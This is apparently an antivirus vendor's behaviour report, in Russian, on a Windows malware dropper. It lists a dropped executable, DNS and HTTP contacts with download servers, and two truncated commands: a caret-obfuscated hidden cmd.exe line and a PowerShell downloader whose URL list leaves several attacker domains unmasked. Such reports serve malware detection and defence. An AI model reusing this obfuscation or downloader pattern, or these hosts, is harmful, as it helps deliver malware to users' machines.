Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C"s^e^t U^1=^.&&^s^et v^E^I=^L&&^s^et ^Ft^0X=^ &&s^e^t ^9l=)^;&&^s^e^t ^Ql^P=^B&&^s^et 4^Z^w=^Ob^j&&s^e^t P^7^l=^$z&&s^e^t 0^5a^b=.^s^av&&^s^et ^gh^1C=e&&^s^e^t ^wg0^K=h^@&&s^e^t ^2Cz=^m&&^s^e...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\cuq.exe
Сетевая активность
Подключается к
- 'gr#####ltnewsreview.com':80
- 'pr###chiland.ru':80
- 'al####okstores.com':80
- 'pe#####kino-atelie.ru':80
TCP
Запросы HTTP GET
- http://gr#####ltnewsreview.com/Kk90joUU
- http://pr###chiland.ru/BNN
- http://www.al####okstores.com/Eh
- http://pe#####kino-atelie.ru/AtfuUF
UDP
- DNS ASK gr#####ltnewsreview.com
- DNS ASK ra####amtaare.com
- DNS ASK pr###chiland.ru
- DNS ASK al####okstores.com
- DNS ASK pe#####kino-atelie.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C"s^e^t U^1=^.&&^s^et v^E^I=^L&&^s^et ^Ft^0X=^ &&s^e^t ^9l=)^;&&^s^e^t ^Ql^P=^B&&^s^et 4^Z^w=^Ob^j&&s^e^t P^7^l=^$z&&s^e^t 0^5a^b=.^s^av&&^s^et ^gh^1C=e&&^s^e^t ^wg0^K=h^@&&s^e^t ^2Cz=^m&&^s^e...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $vhj='Sij';$pXj='http://gr#####ltnewsreview.com/Kk90joUU@http://radiobamtaare.com/NceL4Wi@http://proarchiland.ru/BNN@http://www.alefbookstores.com/Eh@http://peredelkino-atelie.ru/AtfuUF'.Split(...
